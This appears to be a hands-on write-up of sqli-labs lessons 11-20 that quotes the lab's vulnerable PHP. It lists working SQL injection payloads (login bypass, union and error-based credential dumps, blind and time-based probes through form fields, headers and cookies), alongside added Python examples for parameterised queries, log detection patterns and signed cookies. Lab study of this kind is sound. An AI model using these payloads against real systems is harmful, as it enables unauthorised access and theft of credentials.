SQLI-LAB hands-on notes (Less 11 - Less 20)
Source: Internet | Published by: 天天炫舞抽坐骑软件 | Editor: 程序博客网 | Time: 2024/05/01 07:59
What follows is only the record I wrote while working through the sqli-lab exercises, for reference only.
Because I had already studied some SQL injection, most of it comes without explanation; if anything is unclear, please look it up with a search engine and you should find what you need.
Less - 11 Error Based - String (Lesson 11: error based, string)
Test:
http://localhost/sqli-lab/Less-11/index.php uname=' &passwd=' &submit=Submit
Note: this request throws an error.
Firefox's HackBar or Burp is recommended for testing.
The POST format was captured with Burp; the variable names can also be read by right-clicking and viewing the page source.
Ever heard of a "universal password"? Consider using one.
Source Code:
```php
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());   // the raw MySQL error text is echoed to the page
    echo '<img src="../images/slap.jpg" />';
}
```
Solution:
```
uname= ' or '1'='1 &passwd= ' or '1'='1 &submit=Submit
uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit
uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit
```
Others:
```
uname= ' union select database(),6 --+ &passwd= ' union select database(),6 --+ &submit=Submit
uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= ' --+ &submit=Submit
uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= ' --+ &submit=Submit
```
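As an added example (not code from these notes or from sqli-labs), the Less-11 query is rebuilt below in Python on an in-memory SQLite table, once by string concatenation as the lab's PHP does and once as a parameterised query. The table rows and the function names are constructed for illustration. Running it shows the first payload above logging in against the concatenated version, the parameterised version treating the same bytes as a literal username that matches nobody, and the lab's lone-quote probe producing the kind of driver error that `print_r(mysql_error())` echoes to the page.

```python
"""Added example, not the lab's code: the Less-11 login query built two ways.
The users table and its rows are constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table mirroring the lab's column names."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Dumb", "Dumb"), ("admin", "admin")],
    )
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, uname: str, passwd: str):
    """Vulnerable: the input is spliced into the SQL text, exactly like
    @$sql="... username='$uname' and password='$passwd' ..." in the lab."""
    sql = (
        "SELECT username, password FROM users "
        f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1"
    )
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The lab prints mysql_error() here; that text is what error-based
        # injection reads. Returned (not raised) so the caller can see it.
        return f"error: {exc}"


def login_param(conn: sqlite3.Connection, uname: str, passwd: str):
    """Hardened: the SQL text is fixed and the values travel as parameters,
    so a quote in the input is data, never syntax."""
    sql = (
        "SELECT username, password FROM users "
        "WHERE username=? and password=? LIMIT 0,1"
    )
    return conn.execute(sql, (uname, passwd)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # first payload from the solution above
    print("concat, tautology :", login_concat(db, payload, payload))
    print("param,  tautology :", login_param(db, payload, payload))
    print("concat, lone quote:", login_concat(db, "'", ""))
    print("param,  real creds:", login_param(db, "admin", "admin"))
```

The tautology returns the first row (the `LIMIT 0,1` in the lab's query is why the attacker sees one account, not all of them); the same string through `login_param` simply fails to match. The lone quote leaves an unterminated string literal, which is the "this request throws an error" step of the Test above.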
Less - 12 Error Based - Double quotes - String (Lesson 12: error based, double quotes, string)
Test:
http://localhost/sqli-lab/Less-12/index.php uname= ") &passwd= " &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=(" " ") LIMIT 0,1' at line 1
Note: the error message shows directly that $uname and $passwd are wrapped in double quotes plus one pair of parentheses.
Source Code:
```php
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
```
Solution:
```
uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit
uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit
```
Others:
```
uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit
uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit
uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit
```
Less - 13 Double Injection - String - with twist (Lesson 13: double injection, string, with a twist)
Test:
http://localhost/sqli-lab/Less-13/index.php uname= 0' &passwd= 0' &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' ') LIMIT 0,1' at line 1
Note: the error message shows directly that $uname and $passwd are wrapped in single quotes plus one pair of parentheses.
Source Code:
```php
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
```
Solution:
```
uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit
uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit
```
Others:
```
uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
```
Less - 14 Double Injection - Double quotes - String (Lesson 14: double injection, double quotes, string)
Test:
http://localhost/sqli-lab/Less-14/index.php uname= "&passwd=' &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near " " LIMIT 0,1' at line 1
Note: you can see that $uname and $passwd are wrapped in double quotes only.
Source Code:
```php
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
```
Solution:
```
uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit
uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit
uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit
```
Others:
```
uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
```
Less - 15 Blind - Boolean Based - String (Lesson 15: blind, boolean based, string)
Test:
```
http://localhost/sqli-lab/Less-15/index.php uname=" or 1=1 # &passwd=" or 1=1 # &submit=Submit
http://localhost/sqli-lab/Less-15/index.php uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit
```
Note: the first one fails and the second succeeds, so the input is wrapped in single quotes; nothing from the query is echoed, so consider blind injection.
Source Code:
```php
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo '<img src="../images/flag.jpg" />';
}else{
    echo '<img src="../images/slap.jpg" />';   // no mysql_error() output any more
}
```
Solution:
```
uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit
uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit
```
Others:
```
uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit
uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit
```
Less - 16 Blind - Time Based - Double quotes - String (Lesson 16: blind, time based, double quotes, string)
Test:
```
http://localhost/sqli-lab/Less-16/index.php uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit
http://localhost/sqli-lab/Less-16/index.php uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit
```
Note: the first one fails and the second succeeds, so the input is wrapped in double quotes; nothing from the query is echoed, so consider blind injection.
The image it returns reveals whether the condition held, so either boolean-based or time-based injection works.
Source Code:
```php
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo '<img src="../images/flag.jpg" />';
}else{
    echo '<img src="../images/slap.jpg" />';
}
```
Solution:
```
uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit
uname=") or 1=1 or if(1=1, sleep(1), null) #&passwd=") or 1=1 #&submit=Submit
```
Others:
```
uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit
uname=") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #&passwd=") or 1=1 #&submit=Submit
```
Less - 17 Update Query - Error based - String (Lesson 17: update query, error based, string)
Test:
http://localhost/sqli-lab/Less-17/index.php
Note: the page is titled password reset; there are only two inputs, a username and a new password, so you just have to guess a valid username.
Source Code:
```php
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    $row1 = $row['username'];
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    mysql_query($update);
    if (mysql_error()){
        print_r(mysql_error());
    }else{
    }
    echo '<img src="../images/flag1.jpg" />';
}else{
    echo '<img src="../images/slap1.jpg" />';
}
```
Note: the $uname and $passwd fields are run through check_input.
Solution:
```
uname=admin&passwd=666&submit=Submit
```
Others:
```
uname=Dumb&passwd=666&submit=Submit
uname=Angelina&passwd=666&submit=Submit
uname=secure&passwd=666&submit=Submit
```
Less - 18 Header Injection - Error Based - String (Lesson 18: header injection, error based, string)
Test:
http://localhost/sqli-lab/Less-18/index.php uname=admin&passwd=admin&submit=Submit
Your IP ADDRESS is: 127.0.0.1
Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Note: Firefox's Modify Headers extension or Burp is recommended for changing the User-Agent value.
I have already restored the database values that were changed in the previous exercise.
Source Code:
```php
// $uagent and $IP are taken from the request headers earlier in the lab's
// index.php (User-Agent and client address); only the query part is quoted here.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
    // the raw User-Agent goes straight into the INSERT
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
    mysql_query($insert);
    echo 'Your User Agent is: ' .$uagent;
    print_r(mysql_error());
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
```
Note: the $uname and $passwd fields are run through check_input.
Solution:
```
' or '1' = '1
```
Others:
```
' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1
```
Note: the values above go in the User-Agent header; this is time-based blind injection, with a 5 s delay when the guess is wrong.
Less - 19 Header Injection - Referer - Error Based - String (Lesson 19: header injection, Referer field, error based, string)
Test:
http://localhost/sqli-lab/Less-19/index.php uname=admin&passwd=admin&submit=Submit
Your IP ADDRESS is: 127.0.0.1
Your Referer is:
Note: Firefox's Modify Headers extension or Burp is recommended for changing the Referer value.
Source Code:
```php
// Here $uagent holds the Referer header and $IP the client address, both read
// earlier in the lab's index.php; only the query part is quoted here.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
    $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
    mysql_query($insert);
    echo 'Your Referer is: ' .$uagent;
    print_r(mysql_error());
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
```
Note: the $uname and $passwd fields are run through check_input.
Solution:
```
' or '1' = '1
```
Others:
```
' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1
```
Note: the values above go in the Referer header; this is time-based blind injection, with a 5 s delay when the guess is wrong.
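The payloads in Less-15/16 and Less-18/19 share a handful of shapes that a log reviewer can recognise: a quote followed by a tautology, a trailing comment terminator, `sleep()`/`length()`/`ascii()` probes, and in the header lessons all of it arriving in User-Agent or Referer, which the Apache combined log format records verbatim. As an added detection example that is not part of these notes, here is a parser for combined-format lines that checks the referer, user-agent and any query-string parameters against a small indicator list. The log lines, the indicator labels and every function name below are constructed for illustration; the lab itself does no logging.

```python
"""Added example, not the lab's code: flag Less-15/16/18/19 payload shapes in
Apache combined-format access logs. Sample lines and labels are constructed."""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote_plus

# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# (label, pattern) pairs mirroring the payload shapes seen in the write-up.
INDICATORS = [
    ("tautology", re.compile(r"""['"]\s*or\s+['"]?\s*\w+['"]?\s*=\s*['"]?\w+""", re.I)),
    ("comment-terminator", re.compile(r"(--\+|--\s|#)\s*$|/\*")),
    ("time-delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("schema-enum", re.compile(r"\b(information_schema|group_concat|union\s+select)\b", re.I)),
    ("char-probe", re.compile(r"\b(ascii|substr|substring|length)\s*\(", re.I)),
]


def indicators_in(value: str) -> list:
    """Labels of every indicator matching one value. URL-decoded first so that
    %27 and + are seen as the quote and space the database would see."""
    decoded = unquote_plus(value)
    return [label for label, pat in INDICATORS if pat.search(decoded)]


def scan_line(line: str) -> Optional[dict]:
    """Parse one combined-log line and report which untrusted fields carry
    indicators. Returns None when the line does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = {"referer": m["referer"], "agent": m["agent"]}
    # GET parameters sit in the request line; POST bodies are not logged, which
    # is why the header-borne payloads of Less-18/19 are the easy catch here.
    parts = m["request"].split(" ")
    if len(parts) >= 2 and "?" in parts[1]:
        query = parts[1].split("?", 1)[1]
        for name, val in parse_qsl(query, keep_blank_values=True):
            fields[f"param:{name}"] = val
    hits = {name: indicators_in(val) for name, val in fields.items()}
    return {"host": m["host"], "time": m["time"],
            "hits": {n: labels for n, labels in hits.items() if labels}}


def flagged(lines) -> list:
    """Only the parsed records that carry at least one indicator."""
    out = []
    for line in lines:
        rec = scan_line(line)
        if rec and rec["hits"]:
            out.append(rec)
    return out


SAMPLE_LOG = [  # constructed lines, not real traffic
    '127.0.0.1 - - [01/May/2024:07:59:00 +0000] "POST /sqli-lab/Less-18/index.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"',
    '127.0.0.1 - - [01/May/2024:07:59:05 +0000] "POST /sqli-lab/Less-18/index.php HTTP/1.1" 200 512 "-" '
    '"\' or (length(database())) = 8 or if(1=1, sleep(5), null) or \'1\' = \'1"',
    '127.0.0.1 - - [01/May/2024:07:59:09 +0000] "POST /sqli-lab/Less-19/index.php HTTP/1.1" 200 512 '
    '"\' or \'1\' = \'1" "curl/7.68.0"',
    '127.0.0.1 - - [01/May/2024:07:59:12 +0000] "GET /sqli-lab/Less-15/index.php'
    '?uname=%27+or+%28length%28database%28%29%29%29+%3D+8+%23&passwd=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for rec in flagged(SAMPLE_LOG):
        print(rec["time"], rec["host"], rec["hits"])
```

The second sample line is the Less-18 time-based payload in the User-Agent and is flagged on `sleep(` and `length(`; the third is the Less-19 tautology in the Referer; the fourth is a Less-15 probe in a GET parameter, caught by its trailing `#` and `length(`. A genuine browser User-Agent produces no hits. Pairing these hits with response-time outliers from the same log would catch the `sleep(5)` variants even when the pattern list misses them.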
Less - 20 POST - Cookie injections - Uagent field - error based (Lesson 20: POST, cookie injection, Uagent field, error based)
Test:
http://localhost/sqli-lab/Less-20/index.php uname=Dumb&passwd=Dumb&submit=Submit
Note: log in first, for example with an account you know: uname Dumb, pwd Dumb.
After logging in, the page shows the username, password, id, cookie, IP address and User Agent.
You can use Firefox's Firebug to change the value of $uname in the cookie.
Remember to change the expiry time as well, otherwise the cookie expires as soon as you have changed $uname...
Source Code:
Without a cookie (login part):
```php
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1){
    // the bare username becomes the cookie value, with no integrity protection
    setcookie('uname', $cookee, time()+3600);
    header ('Location: index.php');
    print_r(mysql_error());
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';
}
```
With a cookie:
```php
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
// the cookie value is trusted and spliced straight into the query
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result){
    die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo 'Your ID:' .$row['id'];
}else{
    echo '<img src="../images/slap1.jpg" />';
}
```
Note: the $uname and $passwd fields are run through check_input; when a cookie is present, the data displayed from the database is username, password and id.
Solution:
```
Dumb ' or 1=1 #
```
Others:
```
' union select 1,database(),6 or 1=1 #
' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
' union select 1,group_concat(username),group_concat(password) from security.users #
```
Note: the values above are the value of uname in the cookie.
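The cookie branch of Less-20 has two independent problems: the `uname` cookie is a bare username that anyone can edit in Firebug, and whatever it contains is spliced into the SELECT. As an added example that is not the lab's code, the Python below shows the usual remedy for both: the cookie carries an HMAC over the username and is verified with a constant-time comparison before any database access, and the lookup that follows is parameterised. The key, the sample `users` rows and all function names are constructed assumptions.

```python
"""Added example, not the lab's code: an integrity-protected uname cookie and a
parameterised lookup for the 'with cookie' branch of Less-20."""
import hashlib
import hmac
import sqlite3
from typing import Optional

# Assumption: a per-deployment secret kept on the server; constructed here.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def issue_cookie(username: str, key: bytes = SERVER_KEY) -> str:
    """Return 'username.mac' with mac = HMAC-SHA256(key, username)."""
    mac = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}.{mac}"


def read_cookie(value: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the username only if its MAC verifies. Anything edited in the
    browser, or missing the MAC entirely, yields None and never reaches SQL."""
    username, sep, mac = value.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(mac, expected) else None


def lookup(conn: sqlite3.Connection, cookie: str):
    """Hardened replacement for "SELECT * FROM users WHERE username='$cookee'":
    verify first, then bind the value as a parameter."""
    username = read_cookie(cookie)
    if username is None:
        return None
    return conn.execute(
        "SELECT id, username, password FROM users WHERE username=? LIMIT 0,1",
        (username,),
    ).fetchone()


def demo_db() -> sqlite3.Connection:
    """Constructed sample table with the lab's column names."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Dumb", "Dumb"), ("admin", "admin")],
    )
    return conn


if __name__ == "__main__":
    db = demo_db()
    good = issue_cookie("Dumb")
    # The write-up's edit: replace the username part, keep the rest.
    tampered = "Dumb' or 1=1 #" + good[good.rindex("."):]
    print("issued :", lookup(db, good))
    print("edited :", lookup(db, tampered))
    print("bare   :", lookup(db, "Dumb"))
```

With the MAC in place the edited cookie is rejected before the query runs, so the injection payload is never interpreted; the parameterised SELECT is the second, independent layer for the case where some other path lets attacker-controlled text reach the lookup.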